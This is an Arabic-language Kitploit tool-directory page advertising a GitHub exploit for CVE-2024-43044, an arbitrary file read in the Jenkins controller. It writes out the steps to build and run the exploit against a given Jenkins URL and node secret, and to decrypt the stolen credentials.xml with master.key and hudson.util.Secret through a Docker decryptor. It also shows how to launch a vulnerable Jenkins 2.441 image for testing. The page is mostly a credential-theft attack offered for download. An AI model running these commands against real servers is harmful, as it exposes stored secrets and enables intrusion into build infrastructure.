Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/dacc4/cve-2024-43044-jenkins-creds
أدوات التشفير/فك التشفيرتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubdacc4/cve-2024-43044-jenkins-creds

CVE-2024-43044-jenkins-creds

استغلال لـ CVE-2024-43044 يمكّن من قراءة أي ملف من وحدة تحكم Jenkins لاستخراج وفك تشفير credentials.xml باستخدام المفاتيح السرية.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
4منذ سنة واحدةلم تتم المراجعة بعد

مقدمة

هذا استغلال لـ CVE-2024-43044، وهي قراءة ملفات تعسفية تسمح للوكيل بجلب ملفات من المتحكم.

سيستخدم الاستغلال الثغرة لقراءة ملف credentials.xml والحصول على المفاتيح السرية لفك تشفيره.

الكود الأولي : https://github.com/convisolabs/CVE-2024-43044-jenkins الشرح الأصلي : https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/

بناء الاستغلال

root@kitploit:~
mvn package

تشغيل الاستغلال

root@kitploit:~
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>

فك تشفير credentials.xml

root@kitploit:~
docker run \
  --rm \
  --network none \
  --workdir / \
  --mount "type=bind,src=$PWD/master.key,dst=/master.key" \
  --mount "type=bind,src=$PWD/hudson.util.Secret,dst=/hudson.util.Secret" \
  --mount "type=bind,src=$PWD/credentials.xml,dst=/credentials.xml" \
  docker.io/hoto/jenkins-credentials-decryptor:latest \
  /jenkins-credentials-decryptor \
    -m master.key \
    -s hudson.util.Secret \
    -c credentials.xml \
    -o json

اختبار

يمكنك اختباره في إصدار ثغري باستخدام docker:

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17

بمجرد أن يكون لديك Jenkins قيد التشغيل، قم بإعداد وكيل.

تنزيل الأداة